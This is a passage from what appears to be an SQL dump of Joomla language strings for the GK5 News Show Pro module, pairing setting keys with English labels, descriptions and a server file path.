days','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2619,'MOD_NEWS_PRO_GK5_NEWS_IN_DESC','Leave this field blank if you don\'t want to limit articles by period of time.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2620,'MOD_NEWS_PRO_GK5_FRONTPAGE_FEATURED','Show featured items','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2621,'MOD_NEWS_PRO_GK5_FRONTPAGE_FEATURED_DESC','You can disable showing featured items','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2622,'MOD_NEWS_PRO_GK5_UNAUTH','Show unauthorized items','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2623,'MOD_NEWS_PRO_GK5_UNAUTH_DESC','You can disable showing unathorized items','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2624,'MOD_NEWS_PRO_GK5_ONLYFRONTPAGE_ONLYFEATURED','Featured items only','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2625,'MOD_NEWS_PRO_GK5_ONLYFRONTPAGE_ONLYFEATURED_DESC','You can enable showing featured items only.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2626,'MOD_NEWS_PRO_GK5_ONE_ARTICLE_PER_CATEGORY','Display one article per category / author','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2627,'MOD_NEWS_PRO_GK5_ONE_ARTICLE_PER_CATEGORY_DESC','You can enable displaying of the one article for each category','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2628,'MOD_NEWS_PRO_GK5_FIRST_NEWS','First news number','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2629,'MOD_NEWS_PRO_GK5_FIRST_NEWS_DESC','You can show articles from a range specified, this option gives possibility to show, e.g. articles starting from fifth article (if value = 5)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2630,'MOD_NEWS_PRO_GK5_TIME_OFFSET','Time offset','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2631,'MOD_NEWS_PRO_GK5_TIME_OFFSET_DESC','Use this option only when you have a problem with time zone between your location and your hosting location (i.e. when new articles are showing with delay)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2632,'MOD_NEWS_PRO_GK5_JSON_FILE','JSON file','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2633,'MOD_NEWS_PRO_GK5_XML_FILE','XML file','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2634,'MOD_NEWS_PRO_GK5_EXTERNAL_SOURCE','Source file','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2635,'MOD_NEWS_PRO_GK5_EXTERNAL_SOURCE_DESC','Please select the file to be used as an external data source','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2636,'MOD_NEWS_PRO_GK5_USE_OWN_ARTICLE_FORMAT','Use own article format','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2637,'MOD_NEWS_PRO_GK5_USE_OWN_ARTICLE_FORMAT_DESC','When this option is enabled then the module uses to generate article structure the code from folder article_formats (The file with the code must be selected from the list in the \'Article Format\' section).','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2638,'MOD_NEWS_PRO_GK5_ARTICLE_FORMAT','Article format','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2639,'MOD_NEWS_PRO_GK5_ARTICLE_FORMAT_DESC','Please select the article format which will be used to generate the article structures','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2640,'MOD_NEWS_PRO_GK5_ARTICLE_FORMAT_TEXT','Article format text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2641,'MOD_NEWS_PRO_GK5_ARTICLE_FORMAT_TEXT_DESC','You can use this field to input the format data instead of using the *.format files. Please remember to set option \'Article format\' to \'- Do not use -\'','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2642,'MOD_NEWS_PRO_GK5_THUMBS_TYPE','Thumbnail image','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2643,'MOD_NEWS_PRO_GK5_THUMBS_TYPE_DESC','When Image type is set to Joomla! images you can select whether thumbnails are generated from intro or full article image.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2644,'MOD_NEWS_PRO_GK5_INTRO_IMAGE','Intro image','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2645,'MOD_NEWS_PRO_GK5_FULL_IMAGE','Full image','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2646,'MOD_NEWS_PRO_GK5_FIRST_IMAGE','Use first article image','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2647,'MOD_NEWS_PRO_GK5_COM_CONTENT_COMMENTS_SOURCE','Comments Source','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2648,'MOD_NEWS_PRO_GK5_COM_CONTENT_COMMENTS_SOURCE_DESC','You can specify the comments source for the information block','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2649,'MOD_NEWS_PRO_GK5_COMMENTS_SOURCE_NONE','None','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2650,'MOD_NEWS_PRO_GK5_COMMENTS_SOURCE_JCOMMENTS','JComments','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2651,'MOD_NEWS_PRO_GK5_COMMENTS_SOURCE_KOMENTO','Komento','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2652,'MOD_NEWS_PRO_GK5_HIDE_CURRENT_COM_CONTENT_ARTICLE','Hide current article','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2653,'MOD_NEWS_PRO_GK5_HIDE_CURRENT_COM_CONTENT_ARTICLE_DESC','Hides the currently displayed article from the module - use it if you want to avoid duplicated content on the specific subpages','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2654,'MOD_NEWS_PRO_GK5_COM_CONTENT_TEXT_TYPE','Text type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2655,'MOD_NEWS_PRO_GK5_COM_CONTENT_TEXT_TYPE_DESC','You can select which kind of content will be retrieved - intro text or full text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2656,'MOD_NEWS_PRO_GK5_INTROTEXT','introtext','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2657,'MOD_NEWS_PRO_GK5_FULLTEXT','fulltext','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2658,'MOD_NEWS_PRO_GK5_K2_COMMENTS_SOURCE','Comments Source','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2659,'MOD_NEWS_PRO_GK5_K2_COMMENTS_SOURCE_DESC','You can specify the comments source for the information block','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2660,'MOD_NEWS_PRO_GK5_COMMENTS_SOURCE_K2','K2','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2661,'MOD_NEWS_PRO_GK5_HIDE_CURRENT_K2_ARTICLE','Hide current article','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2662,'MOD_NEWS_PRO_GK5_HIDE_CURRENT_K2_ARTICLE_DESC','Hides the currently displayed article from the module - use it if you want to avoid duplicated content on the specific subpages','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2663,'MOD_NEWS_PRO_GK5_K2_GET_EXTRA_FIELDS','Get K2 Extra Fields','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2664,'MOD_NEWS_PRO_GK5_K2_GET_EXTRA_FIELDS_DESC','This option currently works only in the custom article formats - makes possible to retrieve the Extra Field value by its alias.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2665,'MOD_NEWS_PRO_GK5_K2_IMAGE_SIZE','Base image size','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2666,'MOD_NEWS_PRO_GK5_K2_IMAGE_SIZE_DESC','You can select the base size of the source image.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2667,'MOD_NEWS_PRO_GK5_COM_K2_TEXT_TYPE','Text type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2668,'MOD_NEWS_PRO_GK5_COM_K2_TEXT_TYPE_DESC','You can select which kind of content will be retrieved - intro text or full text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2669,'MOD_NEWS_PRO_GK5_EASYBLOG_COMMENTS_SOURCE','Comments Source','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2670,'MOD_NEWS_PRO_GK5_EASYBLOG_COMMENTS_SOURCE_DESC','You can specify the comments source for the information block','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2671,'MOD_NEWS_PRO_GK5_COMMENTS_SOURCE_EASYBLOG','Easy Blog','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2672,'MOD_NEWS_PRO_GK5_HIDE_CURRENT_EASYBLOG_ARTICLE','Hide current article','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2673,'MOD_NEWS_PRO_GK5_HIDE_CURRENT_EASYBLOG_ARTICLE_DESC','Hides the currently displayed article from the module - use it if you want to avoid duplicated content on the specific subpages','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2674,'MOD_NEWS_PRO_GK5_EASYBLOG_IMAGE_SIZE','Base image size','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2675,'MOD_NEWS_PRO_GK5_EASYBLOG_IMAGE_SIZE_DESC','You can select the base size of the source image.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2676,'MOD_NEWS_PRO_GK5_EASYBLOG_IMAGE_SIZE_ORIGINAL','Original','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2677,'MOD_NEWS_PRO_GK5_EASYBLOG_IMAGE_SIZE_THUMBNAIL','Thumbnail','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2678,'MOD_NEWS_PRO_GK5_EASYBLOG_IMAGE_SIZE_ICON','Icon','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2679,'MOD_NEWS_PRO_GK5_VM_ITEMID','VM Item ID','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2680,'MOD_NEWS_PRO_GK5_VM_ITEMID_DESC','Item ID of Virtuemart menu item','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2681,'MOD_NEWS_PRO_GK5_VM_LANG','VM language override','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2682,'MOD_NEWS_PRO_GK5_VM_LANG_DESC','Set ID of the language i.e. \'en_GB\', if the VirtueMart component language is different than language of your website.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2683,'MOD_NEWS_PRO_GK5_VM_SHOPPERGROUPS','Shopper group','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2684,'MOD_NEWS_PRO_GK5_VM_SHOPPERGROUPS_DESC','Allows to display products available only for selected shoppergroup','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2685,'MOD_NEWS_PRO_GK5_VM_OUT_OF_STOCK','Show out of stock products','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2686,'MOD_NEWS_PRO_GK5_VM_OUT_OF_STOCK_DESC','Enable/disable displaying out of stock producst','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2687,'MOD_NEWS_PRO_GK5_VM_PRICE_TYPE_DESC','Determines the type of presented price','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2688,'MOD_NEWS_PRO_GK5_VM_SHOW_WITH_PRICE','Prices with tax','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2689,'MOD_NEWS_PRO_GK5_VM_SHOW_WITH_PRICE_DESC','Enable/disable displaying tax in prices','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2690,'MOD_NEWS_PRO_GK5_VM_ADD_TO_CART','Show add to cart button','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2691,'MOD_NEWS_PRO_GK5_VM_ADD_TO_CART_DESC','Enable/disable add to cart button','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2692,'MOD_NEWS_PRO_GK5_VM_DISCOUNT_AMOUNT','Show discount amount','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2693,'MOD_NEWS_PRO_GK5_VM_DISCOUNT_AMOUNT_DESC','Enable/disable preseting discount value','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2694,'MOD_NEWS_PRO_GK5_VM_TAX','Show tax amount','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2695,'MOD_NEWS_PRO_GK5_VM_TAX_DESC','Enable/disable tax amount displaying','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2696,'MOD_NEWS_PRO_GK5_VM_NONE','none','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2697,'MOD_NEWS_PRO_GK5_VM_BASE','base price','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2698,'MOD_NEWS_PRO_GK5_VM_SALE','sales price','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2699,'MOD_NEWS_PRO_GK5_VM_PRICE_TYPE','Price type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2700,'MOD_NEWS_PRO_GK5_PRODUCT_SALESPRICE_WITH_DISCOUNT','Discount price with tax: ','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2701,'MOD_NEWS_PRO_GK5_PRODUCT_DISCOUNTED_PRICE','Discount price without tax: ','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2702,'MOD_NEWS_PRO_GK5_VMCATEGORIES','VirtueMart categories','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2703,'MOD_NEWS_PRO_GK5_VMCATEGORIES_DESC','Categories from VirtueMart','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2704,'MOD_NEWS_PRO_GK5_VM_DISPLAY_TYPE','Display type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2705,'MOD_NEWS_PRO_GK5_VM_DISCOUNT_DISPLAY_TYPE_DESC','Determines the way of displaying price','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2706,'MOD_NEWS_PRO_GK5_VM_DISCOUNT_TAX_DESC','Enable/disable displaying tax value','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2707,'MOD_NEWS_PRO_GK5_PRICE','Price only','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2708,'MOD_NEWS_PRO_GK5_TEXT_PRICE','Price with text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2709,'MOD_NEWS_PRO_GK5_PRODUCT_PRICE','Price:','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2710,'MOD_NEWS_PRO_GK5_VM_COST_PRICE','Cost price','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2711,'MOD_NEWS_PRO_GK5_VM_BASE_PRICE','Base price','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2712,'MOD_NEWS_PRO_GK5_VM_BASE_PRICE_WTAX','Base price with tax','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2713,'MOD_NEWS_PRO_GK5_VM_DISCOUNT_PRICE_WITHOUT_TAX','Discount price without tax','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2714,'MOD_NEWS_PRO_GK5_VM_SALES_PRICE','Sales price','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2715,'MOD_NEWS_PRO_GK5_VM_CURRENCY_POSITION','Currency position','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2716,'MOD_NEWS_PRO_GK5_VM_CURRENCY_POSITION_DESC','Determine position of currency in price','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2717,'MOD_NEWS_PRO_GK5_VM_BEFORE_PRICE','Before price','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2718,'MOD_NEWS_PRO_GK5_VM_AFTER_PRICE','After price','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2719,'MOD_NEWS_PRO_GK5_VM_FEATURED_BADGE','Show badge on featured products','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2720,'MOD_NEWS_PRO_GK5_VM_FEATURED_BADGE_DESC','Enable/disable additional badge on product marked as featured','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2721,'MOD_NEWS_PRO_GK5_HIKASHOP_ITEMID','HikaShop menu item ID','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2722,'MOD_NEWS_PRO_GK5_HIKASHOP_ITEMID_DESC','Item ID of HikaShop menu item - used for generating URLs','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2723,'MOD_NEWS_PRO_GK5_HIKASHOP_ENABLED_WITH_QUANTITY','Enabled with quantity','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2724,'MOD_NEWS_PRO_GK5_RSS_CACHE_TIME','RSS Feed cache time','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2725,'MOD_NEWS_PRO_GK5_RSS_CACHE_TIME_DESC','Cache time for the downloaded RSS feeds - in minutes','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2726,'MOD_NEWS_PRO_GK5_NEWS_FULL_PAGES_AMOUNT','Amount of pages with arts','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2727,'MOD_NEWS_PRO_GK5_NEWS_FULL_PAGES_AMOUNT_DESC','Amount of pages with articles intro. If set to 0 it disables pages with articles completely.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2728,'MOD_NEWS_PRO_GK5_COLUMNS','Amount of columns','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2729,'MOD_NEWS_PRO_GK5_COLUMNS_DESC','Amount of columns visible on one page with articles intros','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2730,'MOD_NEWS_PRO_GK5_ROWS','Amount of rows','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2731,'MOD_NEWS_PRO_GK5_ROWS_DESC','Amount of rows visible on one page with article intros','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2732,'MOD_NEWS_PRO_GK5_ART_PADDING','Article block padding','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2733,'MOD_NEWS_PRO_GK5_ART_PADDING_DESC','Padding for article block as a CSS property value (i.e. 2px 4px 2px 4px)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2734,'MOD_NEWS_PRO_GK5_HEAD_FLOAT','Header floating','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2735,'MOD_NEWS_PRO_GK5_IMAGE_FLOAT','Image floating','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2736,'MOD_NEWS_PRO_GK5_TEXT_FLOAT','Text floating','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2737,'MOD_NEWS_PRO_GK5_INFO_FLOAT','Information floating','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2738,'MOD_NEWS_PRO_GK5_HEAD_FLOAT_DESC','Header floating','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2739,'MOD_NEWS_PRO_GK5_IMAGE_FLOAT_DESC','Image floating','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2740,'MOD_NEWS_PRO_GK5_TEXT_FLOAT_DESC','Text floating','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2741,'MOD_NEWS_PRO_GK5_INFO_FLOAT_DESC','Information floating','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2742,'MOD_NEWS_PRO_GK5_FNULL','No use float','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2743,'MOD_NEWS_PRO_GK5_FNONE','float:none','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2744,'MOD_NEWS_PRO_GK5_FLEFT','float:left','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2745,'MOD_NEWS_PRO_GK5_FRIGHT','float:right','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2746,'MOD_NEWS_PRO_GK5_TCENTER','text-align:center','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2747,'MOD_NEWS_PRO_GK5_TJUSTIFY','text-align:justify','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2748,'MOD_NEWS_PRO_GK5_TLEFT','text-align:left','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2749,'MOD_NEWS_PRO_GK5_TRIGHT','text-align:right','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2750,'MOD_NEWS_PRO_GK5_HEAD_LINK','Header link','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2751,'MOD_NEWS_PRO_GK5_HEAD_FIRST_WORD','Wrap first word','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2752,'MOD_NEWS_PRO_GK5_HEAD_FIRST_WORD_DESC','You can wrap first word in the title with additional span element.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2753,'MOD_NEWS_PRO_GK5_TITLE_ALIAS','Use title alias as a title','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2754,'MOD_NEWS_PRO_GK5_IMAGE_LINK','Image link','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2755,'MOD_NEWS_PRO_GK5_IMAGE_MODAL','Image popup','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2756,'MOD_NEWS_PRO_GK5_IMAGE_MODAL_DESC','If the image link is enabled then the popup will be used to display the full-size image','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2757,'MOD_NEWS_PRO_GK5_TEXT_LINK','Text link','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2758,'MOD_NEWS_PRO_GK5_INFO_FORMAT','Info format','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2759,'MOD_NEWS_PRO_GK5_INFO_FORMAT_DESC','Format based on strings (com_content): %AUTHOR %DATE %HITS %CATEGORY %RATE %COMMENTS %FEATURED %TAGS; (com_k2 and com_easyblog): %AUTHOR %DATE %HITS %CATEGORY %RATE %TAGS %COMMENTS %FEATURED; (com_virtuemart): %CATEGORY %DATE %MANUFACTURER %COMMENTS %STORE; (k2store): %CART %PRICE; (com_hikashop): %CATEGORY %DATE %COMMENTS %STORE; (jomsocial): %DATE %AUTHOR %LIKES %COMMENTS','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2760,'MOD_NEWS_PRO_GK5_CATEGORY_LINK','Category link','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2761,'MOD_NEWS_PRO_GK5_CATEGORY_LINK_DESC','You can enable link to category in article information when it is used as a part of article information','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2762,'MOD_NEWS_PRO_GK5_DATE_FORMAT','Date format','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2763,'MOD_NEWS_PRO_GK5_DATE_FORMAT_DESC','Date format based on PHP function date. Basic elements: Y - year, d - number of day, l - name of the day, H - hours, i - minutes. More at: http://www.php.net/manual/en/function.date.php','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2764,'MOD_NEWS_PRO_GK5_DATEPUBLISH','Used date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2765,'MOD_NEWS_PRO_GK5_DATEPUBLISH_DESC','Date used as an article date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2766,'MOD_NEWS_PRO_GK5_DATE_CREATE','Date of creation','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2767,'MOD_NEWS_PRO_GK5_DATE_PUBLISH','Date of publishing','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2768,'MOD_NEWS_PRO_GK5_DATE_UNPUBLISH','Date of unpublishing','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2769,'MOD_NEWS_PRO_GK5_AUTHORNAME','Author name','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2770,'MOD_NEWS_PRO_GK5_AUTHORNAME_DESC','If the user alias doesn\'t exists then the specified value is used - name or username.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2771,'MOD_NEWS_PRO_GK5_NAME','Name','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2772,'MOD_NEWS_PRO_GK5_USERNAME','Username','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2773,'MOD_NEWS_PRO_GK5_HEAD_POS','Header position','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2774,'MOD_NEWS_PRO_GK5_LEFT','Left','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2775,'MOD_NEWS_PRO_GK5_RIGHT','Right','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2776,'MOD_NEWS_PRO_GK5_CENTER','Center','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2777,'MOD_NEWS_PRO_GK5_JUSTIFY','Justify','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2778,'MOD_NEWS_PRO_GK5_AFTER','After text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2779,'MOD_NEWS_PRO_GK5_IMAGE_POS','Image position','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2780,'MOD_NEWS_PRO_GK5_TEXT_POS','Text position','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2781,'MOD_NEWS_PRO_GK5_INFO_POS','Information position','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2782,'MOD_NEWS_PRO_GK5_MORE_POS','Read more position','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2783,'MOD_NEWS_PRO_GK5_HEAD_ORDER','Header order','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2784,'MOD_NEWS_PRO_GK5_IMAGE_ORDER','Image order','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2785,'MOD_NEWS_PRO_GK5_TEXT_ORDER','Text order','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(2786,'MOD_NEWS_PRO_GK5_INFO_ORDER','Information 